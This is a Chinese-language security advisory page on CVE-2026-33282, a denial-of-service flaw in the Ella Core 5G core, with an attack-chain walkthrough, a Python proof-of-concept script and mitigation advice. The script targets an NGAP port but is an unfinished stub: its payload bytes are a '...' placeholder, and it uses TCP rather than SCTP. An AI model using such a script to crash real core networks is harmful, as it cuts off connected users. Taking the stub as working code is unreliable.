IPBUF安全漏洞报告
English
CVE-2026-33282 CVSS 7.5 高危

CVE-2026-33282 Ella Core拒绝服务漏洞

披露日期: 2026-03-24

漏洞信息

漏洞编号
CVE-2026-33282
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Ella Core

相关标签

拒绝服务DoS5G CoreNGAPElla Core逻辑错误

漏洞概述

Ella Core是专为专网设计的5G核心网组件。在1.6.0版本之前,系统在处理畸形的NGAP LocationReport消息时存在缺陷。由于未正确验证可选信息元素的存在性,攻击者无需身份认证即可发送特制数据包触发系统崩溃,从而导致连接用户的全面服务中断。该问题已在1.6.0版本中修复。

技术细节

该漏洞源于Ella Core在处理NGAP(Next Generation Application Protocol)协议消息时的逻辑缺陷。具体而言,当接收到包含`ue-presence-in-area-of-interest`事件类型的LocationReport消息时,系统代码未对可选的`UEPresenceInAreaOfInterestList`信息元素(IE)进行存在性检查。攻击者可以构造一个包含特定事件类型但故意省略该可选IE的畸形NGAP数据包。当Ella Core解析此消息时,会因访问无效内存或空指针而引发Panic,导致进程异常终止。由于攻击无需认证且通过网络传播,任何可达的攻击者均可通过发送此类恶意消息瘫痪核心网服务,造成严重的可用性影响。

攻击链分析

STEP 1
侦察
攻击者扫描网络以发现暴露的Ella Core NGAP接口。
STEP 2
武器化
攻击者构建特制的NGAP LocationReport消息,包含ue-presence-in-area-of-interest事件类型,但故意省略UEPresenceInAreaOfInterestList信息元素。
STEP 3
投递
攻击者通过网络向目标Ella Core发送该畸形数据包。
STEP 4
利用
Ella Core在解析消息时,因缺少对可选字段的校验而触发空指针引用或逻辑错误,导致进程Panic崩溃。
STEP 5
影响
Ella Core服务停止运行,所有连接的5G用户失去网络连接,造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket # PoC for CVE-2026-33282: Ella Core DoS # This script sends a malformed NGAP LocationReport message # missing the optional UEPresenceInAreaOfInterestList IE. def send_exploit(target_ip, target_port): # Malformed NGAP payload (Simplified representation) # In a real scenario, this requires proper ASN.1 PER encoding # with the specific IE omitted. # Note: Actual byte construction depends on NGAP specs. malformed_payload = bytes.fromhex( "001a" # NGAP PDU type "4003" # Initiating Message "..." # Specific LocationReport structure without the target IE ) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) print(f"[+] Sending malformed packet to {target_ip}:{target_port}") sock.send(malformed_payload) print("[+] Packet sent. Check if the service crashed.") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with actual target IP port = 38412 # Default SCTP/NGAP port (might need specific framing) send_exploit(target, port)

影响范围

Ella Core < 1.6.0

防御指南

临时缓解措施
如果无法立即升级补丁,建议通过网络访问控制列表(ACL)限制对Ella Core服务器的访问,仅允许已知可信的IP地址(如基站设备)连接。同时,密切监控网络流量和系统日志,及时发现并阻止潜在的攻击尝试。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表